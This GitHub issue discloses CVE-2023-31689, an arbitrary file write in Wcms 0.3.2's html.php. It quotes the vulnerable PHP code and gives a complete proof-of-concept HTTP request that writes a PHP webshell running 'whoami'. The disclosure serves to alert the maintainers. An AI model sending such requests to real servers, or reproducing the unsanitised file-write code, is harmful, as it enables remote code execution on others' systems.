Headline
CVE-2023-31689: Arbitrary file write vulnerability in /wcms/wex/html.php · Issue #15 · vedees/wcms
In Wcms 0.3.2, an attacker can send a crafted request from a vulnerable web application backend server /wcms/wex/html.php via the finish parameter and the textAreaCode parameter. It can write arbitrary strings into custom file names and upload any files, and write malicious code to execute scripts to trigger command execution.
Hi, dev team! The code in this file is vulnerable: Arbitrary file write And execute the command through this file
Vulnerability discovery
Vulnerable code found on lines 20 to 23 in the /wcms/wex/html.php file
if (isset($_GET[‘finish’])) { $path = $_GET[‘finish’]; file_put_contents($path, $_POST[‘textAreaCode’]);
Since the finish variable of the GET request and the textAreaCode variable of the POST request are controllable, an attacker can use the file_put_contents function to write malicious code into a custom file
construct poc
Use controllable variables to write malicious code into the shell.php file in the current directory
The payload is as follows:
POST /wangmarket-master/wcms-0.3.2/wcms/wex/html.php?finish=shell.php HTTP/1.1
Host: 192.168.3.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pdvblj8k9q6rin0oroe36m6s77
Upgrade-Insecure-Requests: 1
Content-Length: 36
textAreaCode=<?php system('whoami');?>
It can be seen that the write is successful
get shell
Access the written malicious file, find that the malicious code is successfully executed, and echo it out